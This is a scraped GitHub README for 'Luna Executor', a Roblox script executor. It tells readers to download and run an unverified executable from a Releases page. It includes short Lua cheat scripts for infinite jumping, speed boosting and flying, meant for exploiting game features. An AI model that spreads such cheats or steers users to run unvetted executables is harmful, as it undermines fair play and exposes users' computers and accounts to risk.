8000 GitHub - Cupidz/Luna-Executor: Luna Executor is a robust tool for executing custom scripts in Roblox, enhancing your gameplay with unique features. Join the community on Discord to share your experiences and unlock new capabilities with ease! ๐Ÿ™๐Ÿ’ป
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content

Luna Executor is a robust tool for executing custom scripts in Roblox, enhancing your gameplay with unique features. Join the community on Discord to share your experiences and unlock new capabilities with ease! ๐Ÿ™๐Ÿ’ป

License

Notifications You must be signed in to change notification settings

Cupidz/Luna-Executor

Folders and files

NameName
Last commit message
Last commit date

Latest commit

ย 

History

28 Commits
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 

Repository files navigation

Luna Executor ๐ŸŒ™

Luna Executor

Welcome to the Luna Executor repository! This tool allows you to execute custom scripts within Roblox. With Luna Executor, you can exploit and modify game features to enhance your gaming experience.

Table of Contents

Features

  • Script Execution: Run custom scripts easily within Roblox.
  • User-Friendly Interface: Simple design that allows users to navigate with ease.
  • Robust Performance: Efficient execution of scripts with minimal lag.
  • Regular Updates: Continuous improvements and new features added based on user feedback.

Installation

To get started with Luna Executor, download the latest release from our Releases page.

Once you have downloaded the file, follow these steps to install:

  1. Locate the downloaded file on your computer.
  2. Extract the contents if it is in a compressed format.
  3. Run the executable file to start the installation process.
  4. Follow the on-screen instructions to complete the installation.

Usage

After installation, you can start using Luna Executor. Hereโ€™s how:

  1. Open the Luna Executor application.
  2. Enter or paste your custom script in the provided text area.
  3. Click on the "Execute" button to run the script.

Important Notes

  • Ensure that you have Roblox running before executing scripts.
  • Use scripts responsibly and understand the implications of exploiting game features.

Script Examples

Here are a few examples of scripts you can use with Luna Executor:

Example 1: Infinite Jump

local player = game.Players.LocalPlayer
local userInputService = game:GetService("UserInputService")

userInputService.JumpRequest:Connect(function()
    player.Character:FindFirstChildOfClass("Humanoid"):ChangeState("Jumping")
end)

Example 2: Speed Boost

local player = game.Players.LocalPlayer
local character = player.Character or player.CharacterAdded:Wait()

character.Humanoid.WalkSpeed = 100

Example 3: Fly Script

local player = game.Players.LocalPlayer
local character = player.Character or player.CharacterAdded:Wait()
local userInputService = game:GetService("UserInputService")

local flying = false

function fly()
    flying = not flying
    if flying then
        while flying do
            character.HumanoidRootPart.Velocity = Vector3.new(0, 50, 0)
            wait()
        end
    end
end

userInputService.InputBegan:Connect(function(input)
    if input.KeyCode == Enum.KeyCode.F then
        fly()
    end
end)

Contributing

We welcome contributions from the community! If you want to contribute to Luna Executor, please follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your branch to your forked repository.
  5. Open a pull request to the main repository.

Please ensure your code follows our coding standards and includes appropriate tests.

License

Luna Executor is licensed under the MIT License. You can freely use, modify, and distribute the software as long as you include the original license in your copies.

Support

If you encounter any issues or have questions, please check the Releases section for troubleshooting tips and updates.

You can also reach out through the Issues tab in this repository. We appreciate your feedback and are here to help!


Feel free to explore, use, and contribute to Luna Executor. We hope you enjoy your experience!

0